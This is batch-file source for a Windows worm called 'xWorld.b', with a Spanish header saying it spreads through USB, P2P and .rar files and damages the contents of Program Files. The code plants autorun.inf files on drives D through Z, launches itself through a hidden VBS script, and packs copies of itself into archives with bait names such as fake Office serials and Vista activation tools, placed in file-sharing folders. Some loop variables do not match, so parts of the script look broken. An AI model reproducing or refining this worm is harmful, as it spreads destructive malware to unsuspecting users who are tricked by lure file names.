:: Nombre: xWorld.b
:: Codeado por: Shadow; tshadow; The Shadow
:: Fecha: 14/04/08
:: Info: Worm de propagacion por USB, P2P y .rar . . .
:: Payload: El payload es aleatorio y al ejecutarse daña todos los archivos
:: del directorio ^%programfiles^%
:_
echo set shell = CreateObject
("wscript.shell"
) > "
%temp%\xwr.vbs"
echo shell.run "cmd /c
%a% xc", vbHide
>> "
%temp%\xwr.vbs"
start "%temp%\xwr.vbs"
:xc_
for %%v IN (D F G H I J K L M N O P Q R S T U V W X Y Z
) do call :
cmp %%v
:cmp
echo [autorun]
> "
%1:\autorun.inf"
echo open=xw.bat
>> "
%1:\autorun.inf"
echo shellexecute=xw.bat
>> "
%1:\autorun.inf"
echo shellexecute=xw.bat
>> "
%1:\autorun.inf"
echo shell\explorar\command=xw.bat
>> "
%1:\autorun.inf"
echo shell\explorar=
^&Explorar
>> "
%1:\autorun.inf"
)
:wrm
:worm
:p2p
type %0>op.bat
set o="
%systemdrive%%~p0op.bat"
echo eMule\Incoming\
> %windir%\yer.t
echo Shareaza\Downloads\
>> %windir%\yer.t
echo BearShare\Shared\
>> %windir%\yer.t
echo EDONKEY2000\incoming\
>> %windir%\yer.t
echo LimeWire\Shared\
>> %windir%\yer.t
echo Path_msn_Emoticonos
> %windir%\jer.t
echo sms_gratis
>> %windir%\jer.t
echo polifonicos_free
>> %windir%\jer.t
echo Microsoft_Office_2007_all_serials
>> %windir%\jer.t
echo Windows_Vista_activation_tool
>> %windir%\jer.t
echo Windows_Vista_all_serials
>> %windir%\jer.t
echo MSN_hack_codes
>> %windir%\jer.t
set r="
%programfiles%\WINRAR\WinRAR.exe"
%r% a %windir%\t.rar %o%
:fr2
for /F "tokens=* delims="
%%g in (%windir%\jer.t
) do ( cls
ping -n 2 localhost
> nul %r% a "%%g.rar" "%%g.bat"
)
)
:fr
for /F "tokens=* delims="
%%a in (%windir%\yer.t
) do ( cls
ping -n 2 localhost
> nul %r% a "%%e" "%%~ne.bat"
)
)
)